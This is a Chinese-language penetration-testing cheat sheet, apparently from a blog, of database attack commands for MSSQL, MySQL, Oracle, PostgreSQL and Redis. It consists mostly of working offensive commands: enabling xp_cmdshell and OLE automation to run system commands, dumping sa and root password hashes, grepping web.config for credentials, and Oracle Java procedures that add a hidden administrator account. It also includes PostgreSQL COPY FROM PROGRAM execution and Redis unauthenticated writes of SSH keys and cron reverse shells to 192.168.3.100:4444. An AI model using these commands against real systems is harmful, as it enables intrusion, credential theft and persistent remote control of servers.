数据库命令
8.1 Mssql
Mssql查找开放端口
for /f "tokens=2" %i in ('tasklist /FI "SERVICES eq MSSQLSERVER" /NH') do netstat -ano | findstr %i | findstr LISTENING
Mssql开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
Mssql关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
Mssql xp_cmdshell执行命令
EXEC master..xp_cmdshell "whoami /user";
Mssql开启SP_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
Mssql关闭SP_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
Mssql执行命令有回显-SP_OACreate
declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
exec sp_oamethod @luan,'exec',@exec output,'C:\\windows\\system32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str;
declare @test int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@test output;exec sp_oamethod @test,'exec',@exec output,'ipconfig /all';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out;select @str;--+
Mssql执行命令无回显-SP_OACreate
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >C:\\Window\\Temp\\1.txt'
- Mssql执行命令
sp_execute_external_script
- 开启sp_execute_external_script
EXECUTE sp_configure 'external scripts enabled', 1;RECONFIGURE;
- 利用Python语言执行系统命令
EXECUTE sp_execute_external_script
@language =N'Python',
@script=N'import subprocess;subprocess.call(["whoami"],shell=True)'
- 利用R语言执行系统命令
EXECUTE sp_execute_external_script
@language = N'R',
@script = N'system("whoami")'
Mssql输出base64文件
exec master..xp_cmdshell '>>c:\windows\temp\vars.txt set /p="123456" <nul'; //代替echo输出
查看c盘下web.config文件
findstr /c:"User Id=" /c:"Password=" /si web.config >> tmp.log
findstr /c:"uid=" /c:"Password=" /si web.config >> tmp.log
常SQL规工作组内网环境下的mssql实例
PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"
Mssql查询sa密码
select name,password from syslogins
Mssql查询sa密码
Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa'
列出所有库
SELECT name FROM MASTER..SysDatabases ORDER BY Name;--+
SELECT NAME FROM MASTER.dbo.SysDatabases ORDER BY NAME;--+
列出某个库所有表
SELECT Name FROM [databasename]..SysObjects Where XType='U' ORDER BY Name;--+
列出表的字段
SELECT TABLE_CATALOG,TABLE_NAME,COLUMN_NAME,DATA_TYPE from [databasename].information_schema.columns where TABLE_NAME = 'tablename';--+
SELECT COLUMN_NAME,DATA_TYPE from [databasename].information_schema.columns where TABLE_NAME = 'tablename';--+
varbinary数据类型hex编码
SELECT TOP 2 sys.fn_varbintohexstr(pass),user FROM [dbo].[admin];--+
xp_dirtree列目录
exec master.dbo.xp_dirtree [c:\windows\],1,1;--+
exec master.dbo.xp_dirtree 'c:\windows\',1,1;--+
exec xp_subdirs "C:\\WINDOWS\\"
写表读取本地文件
CREATE TABLE temp (data varchar(2000));--+
BULK INSERT dbo.temp FROM 'C:\Windows\System32\inetsrv\config\applicationHost.config';--+
select * from dbo.temp;--+
查询sqlserver数据库如何批量查询每个表前10条内容
database=School
DECLARE @table_name VARCHAR(MAX)
DECLARE table_cursor CURSOR FOR
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
AND TABLE_CATALOG = 'database=School'
OPEN table_cursor
FETCH NEXT FROM table_cursor INTO @table_name
WHILE @@FETCH_STATUS = 0
BEGIN
DECLARE @sql_string VARCHAR(MAX)
SET @sql_string = 'SELECT TOP 1000 * FROM School.dbo.' + @table_name
EXECUTE(@sql_string)
FETCH NEXT FROM table_cursor INTO @table_name
END
CLOSE table_cursor
DEALLOCATE table_cursor
查询sqlserver数据库如何批量查询每个表前10条内容,并备份为csv文件,我们可以利用bcp
database=School
==========================================================================================
-T 表示使用 Trusted Connection。当使用 -T 参数时,bcp 将使用 Windows 身份验证来连接到 SQL Server。
-S 指定要连接的 SQL Server 实例的名称。
默认实例: MSSQLSERVER
HOSTNAME=IIS85-CN
实例名=SQLEXPRESS
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -T -S IIS85-CN
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -T -S IIS85-CN\SQLEXPRESS
==========================================================================================
bcp "SELECT name FROM School.sys.tables" queryout C:\backup\tables.txt -c -t, -S localhost -U sa -P admin
==========================================================================================
FOR /F %i IN (C:\backup\tables.txt) DO (
bcp "SELECT TOP 10 * FROM School.dbo.%i" queryout C:\backup\%i.csv -c -t, -S localhost -U sa -P admin
)8.2 Mysql
Mysql基础命令
显示版本: select version();
显示字符集: select @@character_set_database;
显示数据库: show databases;
显示表名: show tables;
显示字段: show columns from table_name;
显示计算机名: select @@hostname;
系统版本: select @@version_compile_os;
mysql路径: select @@basedir;
数据库路径: select @@datadir;
describe describe table_name;
显示root密码: select User,Password from mysql.user;
导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql安装路径: show variables;
更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
mysql更改root密码: mysqladmin -u root password "newpwd";
查询表: select concat(User,0x3a,Password) from mysql.user;
获取数据库所有表: SHOW TABLES FROM `databases`;
获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;
更新mysql root密码
update user set authentication_string=PASSWORD('123456') where user='root';
flush privileges;
sqlmap mysql udf 提权
sqlmap -d "mysql://root:123456@192.168.3.184:3306/mysql" --os-shell --random-agent
查看数据库及操作系统的架构
select @@version_compile_os, @@version_compile_machine;
show variables like '%compile%';
查看secure_file_priv属性
show global variables like '%secure%';
show global variables like '%secure_file_priv%';
查看plugin目录
select @@plugin_dir ;
show variables like 'plugin%';8.3 Oracle
查询SID
select instance_name from v$instance
查询当前IP
select sys_context('userenv','ip_address') from dual
sqlplus远程连接
sqlplus system/123456@192.168.3.100:1521/orcl
oracle 提权 有回显 需要sqlplus
赋权
begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/
创建java代码
create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException;
public class Test
{
public static String list_cmd(String str){
Runtime runtime=Runtime.getRuntime();
StringBuffer enco = new StringBuffer();
enco.append("GBK");
try{
Process proc =runtime.exec(str);
InputStream inp_suc=proc.getInputStream();
InputStream inp_err=proc.getErrorStream();
BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
String strLine;
while( (strLine=(bfr_suc.readLine())) != null){
System.out.println(strLine);
}
while( (strLine=(bfr_err.readLine())) != null){
System.out.println(strLine);
}
proc.destroy();
inp_suc.close();
inp_err.close();
}catch (Exception e) {
System.out.println("EXECUTE IS ERROR!");
System.out.println(e.getMessage());
}
return "";
}
/* public static void main(String[] args){
list_cmd(args[0]);
}
**/
}
/
create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/
SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');
oracle 提权 无回显 需要sqlplus
create or replace and resolve java source named JAVACMD as
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execmd(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
}
/
create or replace procedure MYJAVACMD(command in varchar) as language java
name 'JAVACMD.execmd(java.lang.String)';
/
EXEC MYJAVACMD('net user ASP.NET Admin12345 /add');
EXEC MYJAVACMD('net localgroup administrators Admin12345 /add');
https://loong716.top/posts/Oracle_Database_Security/ 渗透过程中Oracle数据库的利用
https://www.helloworld.net/p/5623921467 Oracle数据库提权(dba权限执行系统命令)8.4 PostgreSql
查找postgresql 所有数据库名字
select datname from pg_database;
# 删除并创建用于保存系统命令执行结果的表
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
# 命令执行测试,多试几条
COPY cmd_exec FROM PROGRAM 'id';
COPY cmd_exec FROM PROGRAM 'ifconfig';
# 查看结果
SELECT * FROM cmd_exec;8.5 Redis
Redis未授权写密钥
ssk-keygen
cat .ssh/id_rsa.pub
redis-cli -h 173.239.46.188 -a password
指定目录
config set dir /root/.ssh
指定文件名
config set dbfilename authorized_keys
设置公钥内容
set x "\n\n\n id_rsa.pub \n\n\n"
保存
save
Redis未授权写反弹shell
set x "\n* * * * * exec /bin/sh 0</dev/tcp/192.168.3.100/4444 1>&0 2>&0\n"
set x "\n* * * * * bash -i >& /dev/tcp/192.168.3.100/4444 0>&1\n"
config set dir /var/spool/cron
config set dbfilename root
save© 版权声明
THE END
暂无评论内容